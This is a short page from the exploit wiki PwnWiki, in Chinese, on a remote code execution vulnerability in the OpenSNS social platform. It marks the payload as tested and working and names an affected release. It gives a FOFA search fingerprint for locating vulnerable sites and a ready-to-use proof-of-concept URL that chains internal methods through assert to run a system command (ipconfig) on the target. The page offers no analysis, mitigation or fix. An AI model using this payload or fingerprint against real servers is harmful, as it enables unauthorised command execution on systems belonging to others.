OpenSNS 远程代码执行漏洞

From PwnWiki
This page is a translated version of the page OpenSNS 遠程代碼執行漏洞 and the translation is 100% complete.
Check.png 該漏洞已通過驗證。
本頁面的EXP/POC/Payload經測試可用,漏洞已經成功復現。


Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞影响

OpenSNS

经过测试,在Uploads_Download_2020-05-14_5ebca066a3fef版本成功利用。

FOFA

icon_hash="1167011145"

POC

http://<target>/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ipconfig)
Retrieved from "https://pwnwiki.com/index.php?title=OpenSNS_遠程代碼執行漏洞/zh-cn&oldid=6014"